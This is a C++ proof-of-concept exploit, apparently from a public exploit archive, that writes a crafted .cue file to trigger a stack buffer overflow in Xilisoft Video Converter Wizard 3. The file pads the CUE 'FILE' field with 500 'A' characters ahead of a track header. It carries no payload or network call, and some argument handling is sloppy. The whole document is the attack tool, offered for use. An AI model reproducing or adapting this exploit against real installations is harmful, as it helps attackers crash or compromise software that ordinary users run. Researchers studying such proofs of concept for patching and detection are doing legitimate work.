/* ---------------------------------------------------------------------------------------- Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC name: xilisoft.cpp Credits : fl0 fl0w ---------------------------------------------------------------------------------------- ScreanShot in the debugger Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg ---------------------------------------------------------------------------------------- */ //Start #include <stdio.h> #include <string.h> #include <stdio.h> #include <assert.h> #include <windows.h> #define SIZE 100000 #define FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.." class EXPLOIT { public: int check (char *, char *); void Usage (char *); }; static int Poz = 1; static int Neg = 0; int i; char Name [SIZE]; char NeWbuff [SIZE]; int main (int argc, char *argv []) { EXPLOIT VIDEO; if ( argc < 2) VIDEO.Usage ( argv [0]); if ( VIDEO.check ( argv [1], "-file") == Neg) { fprintf ( stdout , " Incorect input "); printf ( " \t..Usage is %s -file filename.. \n", Name); exit ( 0); } do { NeWbuff [i] = 'A'; i++; }while (i < 500); FILE *f; strcpy (Name, argv [2]); strcat (Name, " .cue "); f = fopen (Name, "w"); assert ( f != NULL); strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF)); fputs("FILE \"", f); fprintf ( f, " %s ", NeWbuff); fprintf ( stdout , "File build ! "); exit ( 0); getchar (); return 0; } int EXPLOIT::check (char *Arg_, char *_Arg) { if ( strcmp ( Arg_, _Arg) == 0) return Poz; return Neg; } void EXPLOIT::Usage (char *Name) { system ("cls"); fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n "); printf ( " \t..Usage is %s -file filename.. \n", Name); fprintf ( stdout , "..All Credits fl0 fl0w.. \n"); } //EOF